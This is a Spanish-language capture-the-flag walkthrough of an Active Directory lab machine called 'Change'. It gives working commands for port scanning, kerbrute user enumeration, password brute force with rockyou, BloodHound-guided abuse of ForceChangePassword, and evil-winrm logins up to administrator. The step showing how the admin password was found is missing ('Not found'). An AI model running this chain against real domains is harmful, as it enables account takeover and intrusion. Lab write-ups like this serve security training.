Change

🔍 Dificultad: Media

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.54

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -sVC -p- -n --min-rate 5000 192.168.1.54

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Durante el escaneo, se identificaron múltiples puertos abiertos relacionados con servicios típicos de Active Directory en un entorno Windows Server. A continuación, se detalla cada uno:

Puerto
Servicio
Descripción
Relevancia en Pentesting

53

DNS (Simple DNS Plus)

Servicio de resolución de nombres. Fundamental para la operación del dominio.

Enumeración de zonas, DNS spoofing, análisis de transferencias (dig axfr).

88

Kerberos

Protocolo de autenticación utilizado por AD.

Objetivo de ataques como Kerberoasting, Pass-the-Ticket, Golden Ticket.

135

MS RPC

Microsoft RPC endpoint mapper.

Comunicación entre servicios. Puede facilitar enumeración vía rpcclient.

139

NetBIOS-SSN

Servicio para compartir archivos e impresoras (NetBIOS).

Usado con smbclient, enum4linux-ng, smbmap.

389

LDAP

Protocolo para acceder al directorio (modo sin cifrar).

Enumeración de usuarios, grupos, SPNs, flags UAC. Clave en enumeración AD.

445

SMB (Microsoft-DS)

Compartición de archivos en Windows.

Dump de hashes, movimiento lateral (SMBexec, Psexec), enumeración sin creds.

464

kpasswd5

Servicio para cambio de contraseñas vía Kerberos.

Interesante para ataques como krbrelayx o abuso de cuentas.

593

RPC over HTTP

Comunicación RPC encapsulada en HTTP.

Utilizado por Exchange, Outlook y otras apps. A veces base de ataques internos.

636

LDAPS (tcpwrapped)

LDAP sobre SSL/TLS.

Enumeración segura del directorio, aunque a menudo filtrado o cifrado.

3268

Global Catalog (LDAP)

Puerto usado para consultas a todo el bosque AD.

Ideal para enumerar objetos de todo el dominio.

3269

GC over SSL (tcpwrapped)

Versión segura del Global Catalog.

Misma funcionalidad que el 3268, pero cifrado.

5985

WinRM (HTTP)

Windows Remote Management.

Punto de entrada para evil-winrm. Fundamental para ejecución remota.

9389

.NET Message Framing

Servicio para autenticación de AD Web Services (ADWS).

Utilizado por PowerShell Remoting, BloodHound, etc.

47001

HTTPAPI

Servicio adicional HTTP, generalmente WinRM.

Usado por PowerShell Remoting.

49664–49714

MS RPC dinámicos

Puertos de comunicación RPC asignados dinámicamente.

Relevantes para movimiento lateral, enumeración y abuso de servicios remotos.

🔎 EXPLORACIÓN

Tras el escaneo, hacemos una enumeración SMB.

nxc smb 192.168.1.54

Tenemos un dominio que añadimos al fichero /etc/hosts. Miramos los recursos compartidos.

nxc smb 192.168.1.54 --shares -u '' -p ''
smbmap --no-banner -H 192.168.1.54 -u '' -p ''

🚀 EXPLOTACIÓN

Tras no encontrar nada, intentamos sacar usuarios a través del dominio.

./kerbrute userenum -d megachange.nyx --dc 192.168.1.54 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt

Realizamos fuerza bruta al usuario alfredo.

nxc smb 192.168.1.54 -u 'alfredo' -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding

A través de Bloodhound investigamos el dominio.

bloodhound-python -u 'alfredo' -p 'Password1' -ns 192.168.1.54 -d megachange.nyx -c All --zip

Subimos el Zip y analizamos.

Alfredo tiene capacidad de ForceChangePassword sobre SysAdmin. Significa que puede usar net para cambiar la contraseña del usuario SysAdmin.

net rpc password sysadmin 'Hola123' -U "megachange.nyx/alfredo%Password1" -S 192.168.1.54

Validamos el cambio por SMB.

netexec smb 192.168.1.54 -u 'sysadmin' -p 'Hola123'

Validamos el cambio por WINRM.

netexec winrm 192.168.1.54 -u 'sysadmin' -p 'Hola123'

Sabiendo eso nos conectamos.

evil-winrm -i 192.168.1.54 -u 'sysadmin' -p 'Hola123'

🔐 PRIVILEGIOS

Subimos winPEASx64.exe y ejecutamos.

Not found

Habiendo obtenido estas credenciales las validamos como anteriormente.

netexec smb 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'
netexec winrm 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'

Esto significa que nos podemos conectar como Administrator.

evil-winrm -i 192.168.1.54 -u 'administrator' -p 'd0m@in_c0ntr0ll3r'

Ya podemos obtener las flags.

Last updated

Was this helpful?